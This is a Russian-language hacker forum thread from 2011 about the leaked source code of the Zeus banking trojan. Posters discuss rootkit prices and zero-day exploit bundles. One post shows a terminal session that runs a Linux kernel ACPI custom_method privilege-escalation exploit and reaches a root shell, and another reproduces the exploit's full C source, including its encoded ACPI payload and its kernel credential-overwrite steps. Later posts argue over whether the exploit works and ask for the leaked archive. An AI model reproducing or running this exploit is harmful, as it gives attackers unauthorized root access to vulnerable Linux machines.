Исходники Зевса

Тема в разделе "WASM.HEAP", создана пользователем Satsura, 11 май 2011.

  1. intel_x128

    intel_x128 New Member

    Публикаций:
    0
    Регистрация:
    17 май 2009
    Сообщения:
    345
    Вайтхетам фиолетово
     
  2. felize

    felize New Member

    Публикаций:
    0
    Регистрация:
    2 июн 2009
    Сообщения:
    39
    получение адреса функции и вызов ее
     
  3. izl3sa

    izl3sa New Member

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    164
    Адрес:
    Spb
    2intel_x128
    даже больше, насрать всем. Профит призрачный от такого старого гавна.
     
  4. Com[e]r

    Com[e]r Com[e]r

    Публикаций:
    0
    Регистрация:
    20 апр 2007
    Сообщения:
    2.624
    Адрес:
    ого..
    кто-то недавно говорил мне что сорцы не должны лежать, хотябы когда они устаревают - должны попадать в сеть, на растерзание одептам, и всё такое.
    хотя вот тут даже фиг знает: для "профи" - там искать нечего, а для новичка там ничего не будет понятно,
    зато все сейчас дружно посмеются над срывом покровов, а моддингом и тюнингом этого монстра никто заниматься не станет.
    или станет лишь тот, кто не осилит даже компилер настроить.

    наверное и к лучшему - это "зевс-зевсушка" кругом уже поднадоело, будет меньше этой болтовни,
    да и энтузиасты наклепают новое золотое руно, свято место пусто не бывает.

    такие же ощущения навеяло при первом прочтении)
     
  5. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>К примеру, какова примерная стоимость руткита(не паблик), для linux систем (функционирующий только в ядре). С такими возможностями.
    Инъекция данных в вывод http сервера (сжатые страницы, с поддержкой чанков). Сниффер(с автоматическим сбором паролей, и заносом их в БД). Бекконнект, скрытие процессов, файлов.Выполнение команд. Поддержка резервных серверов.
    - эти все функции реализованны и паблик руткитах ; отличие таргетед от паблик в связках сплоетов и технике сокрытия (инжект или LKM). к примеру недавно попадался мне сэмпл одного руткита в котором реализованно 4 зеродей сплоета (из них только один паблик сплоет уровня ядра.: Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation. Связка выполнена на высоком уровнем, о чем говорит например вот этот сплоет Linux Kernel < 2.6.38-rc pkt_rd Remote Kernel Memory Disclosure ). Цена на закрытых китайских форумах только одного такого сплойта колеблется от 15к-22к $. Поэтому тут сложно сказать сколько будет стоить ваш руткит, ибо сборка осуществляется исходя из ваших предпочтений.


    >>хотя вот тут даже фиг знает: для "профи" - там искать нечего, а для новичка там ничего не будет понятно,
    зато все сейчас дружно посмеются над срывом покровов, а моддингом и тюнингом этого монстра никто заниматься не станет.
    или станет лишь тот, кто не осилит даже компилер настроить.
    - +1
     
  6. glass0x

    glass0x New Member

    Публикаций:
    0
    Регистрация:
    28 ноя 2010
    Сообщения:
    62
    Satsura

    +100500 в карму за исходники. Не то что все остальные, у которых они были, и они тупо их жали.
     
  7. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>Это наверно китайский вариант cve-2010-3437 aka Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
    - наверное , наверное... тебе ж виднее (;
     
  8. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>вот этот паблик Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation работает только на ноутах, что опять же говорит о высоком уровне связки для взлома серверов.

    $ uname -a
    Linux void 2.6.37-generic #Slackware SMP D:m:t:Y :p i686 GNU/Linux
    uid=1000(x_h4ck) gid=1000(x_h4ck) группы=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),126(sambashare),1000(x_h4ck)
    $ gcc platforms/linux/local/15774.c -o ~/15774
    $ ~/15774
    [+] resolving required symbols...
    [+] checking for world-writable custom_method...
    [+] checking for an ACPI LID device...
    [+] poisoning ACPI tables via custom_method...
    [+] triggering ACPI payload via LID device...
    [+] triggering exploit via futimesat...
    [+] launching root shell!
    # id
    uid=0(root) gid=0(root) groups=0(root)

    зы.: не ноутбук. (; у кого не ноут прошу проверьте. (лежит на exploit-db)
     
  9. Orange

    Orange New Member

    Публикаций:
    0
    Регистрация:
    17 июл 2010
    Сообщения:
    37
    Satsura
    Можно линки, plz.
     
  10. felize

    felize New Member

    Публикаций:
    0
    Регистрация:
    2 июн 2009
    Сообщения:
    39
    Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
    Код (Text):
    1. #include <stdio.h>
    2. #include <stdlib.h>
    3. #include <stdint.h>
    4. #include <string.h>
    5. #include <unistd.h>
    6. #include <errno.h>
    7. #include <fcntl.h>
    8. #include <limits.h>
    9. #include <inttypes.h>
    10. #include <sys/types.h>
    11. #include <sys/stat.h>
    12. #include <sys/utsname.h>
    13.  
    14. /*
    15.  * The ASL payload looks like:
    16.  *
    17.  * DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {
    18.  *   Method (\_SB.LID._LID, 0, NotSerialized) {
    19.  *     OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)
    20.  *     Field(KMEM, AnyAcc, NoLock, Preserve) {
    21.  *       HACK, 0x392
    22.  *     }
    23.  *     Store (Buffer () {
    24.  *       0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,
    25.  *       0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,
    26.  *       0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,
    27.  *       0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
    28.  *       0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,
    29.  *       0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,
    30.  *       0xc3 }, HACK)
    31.  *     Return (One)
    32.  *   }
    33.  * }
    34.  *
    35.  * Feel free to `iasl -d` this is you don't trust me! ;-)
    36.  */
    37. #define PAYLOAD_AML \
    38. "\x53\x53\x44\x54\x90\x00\x00\x00\x02\x3e\x00\x00\x00\x00\x00\x00" \
    39. "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x49\x4e\x54\x4c" \
    40. "\x21\x05\x09\x20\x14\x4b\x06\x5c\x2f\x03\x5f\x53\x42\x5f\x4c\x49" \
    41. "\x44\x5f\x5f\x4c\x49\x44\x00\x5b\x80\x4b\x4d\x45\x4d\x00\x0c\xe0" \
    42. "\x61\x17\x01\x0b\x92\x03\x5b\x81\x0c\x4b\x4d\x45\x4d\x00\x48\x41" \
    43. "\x43\x4b\x42\x39\x70\x11\x34\x0a\x31\x55\x48\x89\xe5\x53\x48\x83" \
    44. "\xec\x08\x48\xc7\xc3\x24\x24\x24\x24\x48\xc7\xc0\x24\x24\x24\x24" \
    45. "\xbf\x00\x00\x00\x00\xff\xd0\x48\x89\xc7\xff\xd3\x48\xc7\xc0\xb7" \
    46. "\xff\xff\xff\x48\x83\xc4\x08\x5b\xc9\xc3\x48\x41\x43\x4b\xa4\x01"
    47. #define PAYLOAD_LEN 144
    48.  
    49. #define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"
    50. #define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"
    51.  
    52. unsigned long
    53. get_symbol(char *name)
    54. {
    55.     FILE *f;
    56.     unsigned long addr;
    57.     char dummy;
    58.     char sname[512];
    59.     struct utsname ver;
    60.     int ret;
    61.     int rep = 0;
    62.     int oldstyle = 0;
    63.  
    64.     f = fopen("/proc/kallsyms", "r");
    65.     if (f == NULL) {
    66.         f = fopen("/proc/ksyms", "r");
    67.         if (f == NULL)
    68.             goto fallback;
    69.         oldstyle = 1;
    70.     }
    71.  
    72. repeat:
    73.     ret = 0;
    74.     while(ret != EOF) {
    75.         if (!oldstyle)
    76.             ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
    77.         else {
    78.             ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
    79.             if (ret == 2) {
    80.                 char *p;
    81.                 if (strstr(sname, "_O/") || strstr(sname, "_S."))
    82.                     continue;
    83.                 p = strrchr(sname, '_');
    84.                 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
    85.                     p = p - 4;
    86.                     while (p > (char *)sname && *(p - 1) == '_')
    87.                         p--;
    88.                     *p = '\0';
    89.                 }
    90.             }
    91.         }
    92.         if (ret == 0) {
    93.             fscanf(f, "%s\n", sname);
    94.             continue;
    95.         }
    96.         if (!strcmp(name, sname)) {
    97.             fclose(f);
    98.             return addr;
    99.         }
    100.     }
    101.  
    102.     fclose(f);
    103.     if (rep)
    104.         return 0;
    105. fallback:
    106.     uname(&ver);
    107.     if (strncmp(ver.release, "2.6", 3))
    108.         oldstyle = 1;
    109.     sprintf(sname, "/boot/System.map-%s", ver.release);
    110.     f = fopen(sname, "r");
    111.     if (f == NULL)
    112.         return 0;
    113.     rep = 1;
    114.     goto repeat;
    115. }
    116.  
    117. int
    118. main(int argc, char **argv)
    119. {
    120.     int ret;
    121.     FILE *fp;
    122.     char buf[64];
    123.     struct stat sb;
    124.     char payload[PAYLOAD_LEN] = PAYLOAD_AML;
    125.     unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;
    126.  
    127.     printf("[+] resolving required symbols...\n");
    128.  
    129.     sys_futimesat = get_symbol("sys_futimesat");
    130.     if (!sys_futimesat) {
    131.         printf("[-] sys_futimesat symbol not found, aborting!\n");
    132.         exit(1);
    133.     }
    134.  
    135.     prepare_kernel_cred = get_symbol("prepare_kernel_cred");
    136.     if (!prepare_kernel_cred) {
    137.         printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
    138.         exit(1);
    139.     }
    140.  
    141.     commit_creds = get_symbol("commit_creds");
    142.     if (!commit_creds) {
    143.         printf("[-] commit_creds symbol not found, aborting!\n");
    144.         exit(1);
    145.     }
    146.  
    147.     printf("[+] checking for world-writable custom_method...\n");
    148.  
    149.     ret = stat(CUSTOM_METHOD, &sb);
    150.     if (ret < 0) {
    151.         printf("[-] custom_method not found, kernel is not vulnerable!\n");
    152.         exit(1);
    153.     }
    154.  
    155.     if (!(sb.st_mode & S_IWOTH)) {
    156.         printf("[-] custom_method not world-writable, kernel is not vulnerable!\n");
    157.         exit(1);
    158.     }
    159.  
    160.     printf("[+] checking for an ACPI LID device...\n");
    161.  
    162.     ret = stat(HEY_ITS_A_LID, &sb);
    163.     if (ret < 0) {
    164.         printf("[-] ACPI LID device not found, but kernel is still vulnerable!\n");
    165.         exit(1);
    166.     }
    167.  
    168.     if (sizeof(sys_futimesat) != 8) {
    169.         printf("[-] payload is 64-bit only, but kernel is still vulnerable!\n");
    170.         exit(1);
    171.     }
    172.  
    173.     sys_futimesat &= ~0xffffffff80000000;
    174.     memcpy(&payload[63], &sys_futimesat, 4);
    175.     memcpy(&payload[101], &commit_creds, 4);
    176.     memcpy(&payload[108], &prepare_kernel_cred, 4);
    177.  
    178.     printf("[+] poisoning ACPI tables via custom_method...\n");
    179.  
    180.     fp = fopen(CUSTOM_METHOD, "w");
    181.     fwrite(payload, 1, sizeof(payload), fp);
    182.     fclose(fp);
    183.  
    184.     printf("[+] triggering ACPI payload via LID device...\n");
    185.  
    186.     fp = fopen(HEY_ITS_A_LID, "r");
    187.     fread(&buf, 1, sizeof(buf), fp);
    188.     fclose(fp);
    189.  
    190.     printf("[+] triggering exploit via futimesat...\n");
    191.  
    192.     ret = futimesat(0, "/tmp", NULL);
    193.  
    194.     if (ret != -1 || errno != EDOTDOT) {
    195.         printf("[-] unexpected futimesat errno, exploit failed!\n");
    196.         exit(1);
    197.     }
    198.  
    199.     if (getuid() != 0) {
    200.         printf("[-] privileges not escalated, exploit failed!\n");
    201.         exit(1);
    202.     }
    203.  
    204.     printf("[+] launching root shell!\n");
    205.     execl("/bin/sh", "/bin/sh", NULL);
    206. }
     
  11. act

    act New Member

    Публикаций:
    0
    Регистрация:
    10 янв 2010
    Сообщения:
    8
    Ты бы это... не писал от руки?

    PS Заодно расскажи, откуда у тебя /proc/acpi/button/lid/LID/state на не ноуте.
     
  12. F1x1t

    F1x1t New Member

    Публикаций:
    0
    Регистрация:
    25 апр 2008
    Сообщения:
    2
    Приветствую! Скиньте плизз куда нибудь еще архивчик?) Ато оч хочется полазить внутри ) А по первой ссылке не качает =\ "Сервис не доступен" пишет итд и вот такую непонятную конструкцию слов " Привышен лимит месте на хостинге ... Попробуйте позже. !" и не шевелится совсем =)
     
  13. felize

    felize New Member

    Публикаций:
    0
    Регистрация:
    2 июн 2009
    Сообщения:
    39
    act
    http://www.exploit-db.com/exploits/15774/ какие то проблемы?
     
  14. act

    act New Member

    Публикаций:
    0
    Регистрация:
    10 янв 2010
    Сообщения:
    8
    felize
    Я вас не понимаю.
    По данной вами ссылке написано
    Читать надеюсь все умеют.
     
  15. InFlame

    InFlame New Member

    Публикаций:
    0
    Регистрация:
    24 сен 2009
    Сообщения:
    12
  16. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>Satsura же лжет, приводя в пример ядро не х86_64 и показывая, будто спойлт отработал у него
    - отлично отработал на x86, тебе скрин скинуть ? (: ребята кто нить проверьте сплоет наконец на Kernel 2.6.37 x86

    зы.: такое ощущение что у господина act'a личные счеты со мной. ну извени, что слил сорцы... извени что отнял у тебя твой последний хлеб, на который ты зарабатывал барыжничеством... (;
     
  17. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    Бггг :lol: конечно же Сацура знал о релиз кандидатах (:
    ну давайте кто больше, кто меньше! Сольем же грязь на авторов и быдло сорцы (;
    2 act проверка пройдена успешно на 50%. Продолжай в том же духе, сацура сливает и тру и фейк , а ты всем поясняешь, ок (;
    зы.: ждем неделю ровно, дальше все узнаете (;
     
  18. JCronuz

    JCronuz New Member

    Публикаций:
    0
    Регистрация:
    26 сен 2007
    Сообщения:
    1.240
    Адрес:
    Russia
    Блин, какой пароль был на архиве? :) С трудом верится в успешность брутфорса!
     
  19. reversecode

    reversecode Guest

    Публикаций:
    0
    JCronuz
    а ты что знаешь какой был пароль?)) лично устанавливал? ну вот ты и спалился
    кстати имя пользователя jam3s в проекте вижуал студии, это твой второй ник?
     
  20. Nicolai

    Nicolai New Member

    Публикаций:
    0
    Регистрация:
    30 мар 2011
    Сообщения:
    1
    What archive (архиве)? IOO's archive (http://csis.dk/en/csis/blog/3176/) still hasn't been cracked.

    Can you guys understand the comments in the source?